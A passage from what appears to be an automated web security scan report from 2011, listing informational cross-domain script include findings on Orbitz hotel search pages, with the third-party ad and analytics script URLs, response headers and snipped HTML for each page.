http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663148701&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Playa%20Del%20Carmen&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663148701&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Playa%20Del%20Carmen&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=474B9D21867D878F5D238FE6587CDFD0; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:35 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:28 GMT
Content-Length: 556521

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663148701&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Playa+Del+Carmen&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663148701&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Playa+Del+Carmen&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663148701&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Playa+Del+Carmen&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.833. http://www.orbitz.com/hotels/United_Kingdom/London/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/United_Kingdom/London/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663130642&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=GB&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=London&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663130642&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=GB&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=London&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663130642&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=GB&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=London&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DF1AC56A4A36657194045DCBE807270F; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:17 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:10 GMT
Content-Length: 548196

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663130642&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=GB&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=London&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663130642&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=GB&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=London&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663130642&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=GB&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=London&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.834. http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/United_States--CA/Los_Angeles/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663163973&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Los%20Angeles&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663163973&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Los%20Angeles&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663163973&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Los%20Angeles&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BB91361DBADE1A51A4DFD6A67CD15903; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:50 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:43 GMT
Content-Length: 551635

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663163973&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Los+Angeles&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663163973&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Los+Angeles&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663163973&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Los+Angeles&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.835. http://www.orbitz.com/hotels/United_States--CA/San_Diego/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/United_States--CA/San_Diego/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663165657&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San%20Diego&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663165657&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San%20Diego&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663165657&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San%20Diego&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=067DEC1369D71276439BBE2E814093F2; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:44 GMT
Content-Length: 554064

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663165657&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San+Diego&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663165657&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San+Diego&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663165657&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San+Diego&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.836. http://www.orbitz.com/hotels/United_States--CA/San_Francisco/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/United_States--CA/San_Francisco/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663157503&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San%20Francisco&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663157503&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San%20Francisco&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663157503&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San%20Francisco&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6E407EEB7C11176786FE98DFEBED0C34; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:44 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:36 GMT
Content-Length: 552620

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663157503&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San+Francisco&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663157503&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San+Francisco&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663157503&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=San+Francisco&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.837. http://www.orbitz.com/hotels/United_States--FL/Miami/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/United_States--FL/Miami/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663135309&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Miami&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663135309&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Miami&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663135309&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Miami&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=33E8004D61285916135D5168A58C0149; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:22 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:14 GMT
Content-Length: 556927

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663135309&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Miami&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663135309&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Miami&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663135309&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Miami&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.838. http://www.orbitz.com/hotels/United_States--FL/Orlando/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/United_States--FL/Orlando/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663131709&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Orlando&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663131709&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Orlando&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663131709&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Orlando&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=531639EA775BCB0F57839684FE740F16; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
